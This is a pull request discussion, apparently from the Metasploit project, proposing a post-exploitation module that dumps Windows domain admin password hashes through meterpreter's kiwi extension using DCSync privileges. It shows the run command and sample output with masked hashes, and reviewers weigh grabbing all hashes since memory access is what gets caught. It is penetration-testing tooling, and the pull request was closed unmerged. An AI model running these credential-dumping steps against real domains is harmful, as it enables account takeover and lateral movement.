### PR TITLE
Domain admin hash retrieval automation (enum_domain_admin_hashes)

### PR DESCRIPTION
**Pull request by jtesta**
This adds a new post module, `windows/gather/enum_domain_admin_hashes.rb`, which is useful for automating the retrieval of Windows domain admin password hashes in JTR format using the `kiwi` extension.

This module has been observed to obtain more critically-weak LanMan hashes versus other methods (such as impacket's secretsdump.py).

## Verification

- [ ] Obtain a meterpreter session under the context of a domain administrator (or any account with domain DCSync privileges).
- [ ] Do: `run post/windows/gather/enum_domain_admin_hashes`
- [ ] Verify that the correct number of domain admin accounts are enumerated.
- [ ] Verify that the loot file output is in proper JTR format.

## Output

  ```
meterpreter > run post/windows/gather/enum_domain_admin_hashes 

[*] Loading kiwi module...
[*] Enumerating members of "Domain Admins" group for domain ACME...
[*] Found 5 domain admin accounts.
[+] ACME\Administrator:500:81****************************:b7****************************:::
[+] ACME\janesmith:5000:04****************************:af****************************:::
[+] ACME\johnsmith:5001:5b****************************:e1****************************:::
[+] ACME\lafawnduh:5002:4d****************************:1d****************************:::
[+] ACME\reginaldsmith:5003:ec****************************:20****************************:::
[*] Domain admin hash enumeration complete.
[*] Hashes stored in JTR format in /home/jdog/.msf4/loot/20180508180027_default_10.10.10.154_windows.hashes_65325.txt
  ```

### CODE REVIEW

**Comment by bwatters-r7** [comment]
In this case, what is the benefit of only grabbing the admin users?  Is there a threat model that we bypass by only retrieving them?  Since the act of breaking into the process and pillaging memory is what is likely to be caught, why not grab everything and filter it after?  I'm more than happy to concede I am wrong, but to me, it would seem best to grab as much as we can once we do the dangerous part.

**Comment by jtesta** [comment]
@bwatters-r7: really what it came down to is that I didn't have time to research how to do RID cycling through the domain.  I was more interested in getting the admin hashes at the time, too.

I wouldn't mind if this module was extended to grab all the hashes.  I'm not sure I can get to this quickly, though.  Can we land this in the meantime, then at some point later, extend it?

**Comment by OJ** [comment]
Grabbing all hashes via dcsync is possible via the new modifications to the
PowerShell extension.

**Comment by acammack-r7** [comment]
Closed in lieu of other post changes from OJ.

**Pull request closed without merging**
